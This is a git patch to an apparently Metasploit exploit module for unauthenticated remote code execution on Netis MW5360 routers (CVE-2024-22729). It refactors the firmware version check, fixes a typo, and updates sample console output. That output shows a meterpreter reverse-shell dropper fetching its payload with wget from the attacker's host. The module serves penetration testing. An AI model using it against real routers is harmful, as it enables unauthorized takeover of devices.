From 55fa94995b5a1252e0be7b1f2ad7411f652ee12a Mon Sep 17 00:00:00 2001
From: h00die-gr3y <h00die.gr3y@gmail.com>
Date: Thu, 6 Jun 2024 22:23:35 +0000
Subject: [PATCH] Updated check method

---
 .../http/netis_unauth_rce_cve_2024_22729.md    |  2 +-
 .../http/netis_unauth_rce_cve_2024_22729.rb    | 18 +++++++-----------
 2 files changed, 8 insertions(+), 12 deletions(-)

diff --git a/documentation/modules/exploit/linux/http/netis_unauth_rce_cve_2024_22729.md b/documentation/modules/exploit/linux/http/netis_unauth_rce_cve_2024_22729.md
index 0d6cdeb0f1f3..52327a22659a 100644
--- a/documentation/modules/exploit/linux/http/netis_unauth_rce_cve_2024_22729.md
+++ b/documentation/modules/exploit/linux/http/netis_unauth_rce_cve_2024_22729.md
@@ -195,7 +195,7 @@ msf6 exploit(linux/http/netis_unauth_rce_cve_2024_22729) > exploit
 [*] Started reverse TCP handler on 192.168.1.2:4444
 [*] Running automatic check ("set AutoCheck false" to disable)
 [*] Checking if 192.168.1.1:80 can be exploited.
-[+] The target appears to be vulnerable. Netis MW5360 1.0.1.3442
+[+] The target appears to be vulnerable. Netis(MW5360)-V1.0.1.3442
 [*] Executing Linux Dropper for linux/mipsle/meterpreter_reverse_tcp
 [*] Using URL: http://192.168.1.2:8080/IbZMnLDC
 [*] Executing wget -qO /tmp/kgfXdZZW http://192.168.1.2:8080/IbZMnLDC
diff --git a/modules/exploits/linux/http/netis_unauth_rce_cve_2024_22729.rb b/modules/exploits/linux/http/netis_unauth_rce_cve_2024_22729.rb
index cfc1be3af7a7..0f87b3082aa5 100644
--- a/modules/exploits/linux/http/netis_unauth_rce_cve_2024_22729.rb
+++ b/modules/exploits/linux/http/netis_unauth_rce_cve_2024_22729.rb
@@ -75,7 +75,7 @@ def execute_command(cmd, _opts = {})
     # store name of payload and cleanup payload file when session is established (see def on_new_session)
     @payload_name = cmd.split('+x')[1].strip if cmd.include?('chmod +x')
 
-    # skip last command to remove payload becuase it does not work
+    # skip last command to remove payload because it does not work
     unless cmd.include?('rm -f')
       app_random = Rex::Text.rand_text_alphanumeric(4..8)
       payload = Base64.strict_encode64("`#{cmd}`")
@@ -113,19 +113,15 @@ def check
     # trying to get the model and version number
     # unfortunately JSON parsing fails, so we need to use this ugly REGEX :-(
     version = res.body.match(/.?(version).?\s*:\s*.?((\\|[^,])*)/)
-    model = res.body.match(/.?(model).?\s*:\s*.?((\\|[^,])*)/)
-    unless version.nil? || model.nil?
+    unless version.nil?
       version_number = version[2].split('-V')[1].chop
-      model_number = model[2].chop
+      model_number = version[2].split('-V')[0][/\(([^(]+)/, 1].chop
       # Check if target is model MW5360 and running firmware 1.0.1.3442 (newest release 2024-04-24) or lower
-      if version_number && model_number == 'MW5360'
-        if Rex::Version.new(version_number) <= Rex::Version.new('1.0.1.3442')
-          return CheckCode::Appears("Netis #{model_number} #{version_number}")
-        end
-
-        return CheckCode::Safe("Netis #{model_number} #{version_number}")
+      if version_number && model_number == 'MW5360' && (Rex::Version.new(version_number) <= Rex::Version.new('1.0.1.3442'))
+        return CheckCode::Appears(version[2].chop.to_s)
       end
-      CheckCode::Safe("#{model_number} #{version_number}")
+
+      return CheckCode::Safe(version[2].chop.to_s)
     end
     CheckCode::Safe
   end